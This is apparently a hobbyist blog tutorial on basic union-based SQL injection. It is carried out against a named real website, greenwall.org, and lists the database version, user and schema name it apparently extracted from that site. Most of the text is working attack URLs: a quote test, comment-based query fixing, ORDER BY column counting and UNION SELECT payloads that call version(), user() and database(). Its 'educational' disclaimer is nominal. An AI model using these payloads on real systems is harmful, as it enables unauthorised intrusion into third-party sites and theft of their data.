Basic part of sqli practically



hello Guyzzz

only for  Educational purpoe

let me intorduce my self



im Adesh kolte  and im from india,



this is my first tutorial on basic sql injection



this was the basic tutorial so it will be  little lengthy so be patient while watching



im not discussing any theory regarding sql injection so i recommend watch some articles about sql db strucute and backend process of sql injection to understand the sql injection in a better way .so im discussing only the practial part.



before starting injecting download the following tool from google



=>  hackbar addon or rootkajji addon for mozilla firefox.



ok lets start with basic  based sql injection





site>  http://greenwall.org/recent-news.php?id=16

we can check whether the site is vulnerable to sql injection or not by putting a singlequote or a back slash (\) after perameter [id=2] lets try on a site



http://greenwall.org/recent-news.php?id=16 '

'



we got the following error





=> check the manual that corresponds to your MySQL server version for the right syntax to use near ''-- -' at line 1

that mean this site is vulnerable to sql injection





and some times even the site dontshow this error there is a chance for sql injection vulnerability



in such cases how we can know that our target site is vulnerable or not ??



obseve the site behaviour mean => when u put  a single quote or  backslash (\) after perameter( id=2' ) u can obseve some content is missing on page or something on the page don't load normally, so it also mean that our target site is vulnerable to sql injection.***



ok lets continue with our injection





 http://greenwall.org/recent-news.php?id=16 '





we got an sql error



first of all we have to fix the query before we go further



(fixing query is nothing but making the site load normally without any error)



usually we use -- in integer based to fix the query



http://greenwall.org/recent-news.php?id='16 '--+ (error fixed)







so we can continue to the next part which is finding number of coloumns in the site



there are many methords for finding no.of coloumns for now im showing only 2 mehords.***



one with order by and the other with group by



1. order by



http://greenwall.org/recent-news.php?id='16 '

 order by 100--+



we got the following error



Query failed: blank some text missing



http://greenwall.org/recent-news.php?id='16 '

 order by 16--+

it mean the site has less than 16 coloumns



now we have to use union statement to find the vulnerable coloumns



http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -



u can see 3 and 4 numbers on page(vulnerable coloumns)



now we can get everything from this vulenrable coloumns





lets get some basic information Smile



note::



1. version() or @@version  => to display version of server



2. user() or @@user => to display the username of site







ok lets get them one by one





http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -



result on web page =>



5.6.29



http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -



result => green62_view@localhost







http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -



result => green62_site





thats all for this tutorial

Enjoy

tutorial by Adesh kolte

Video tutorial

Basic part of sqli

https://youtu.be/A-EYrT3i_v0
Posted by at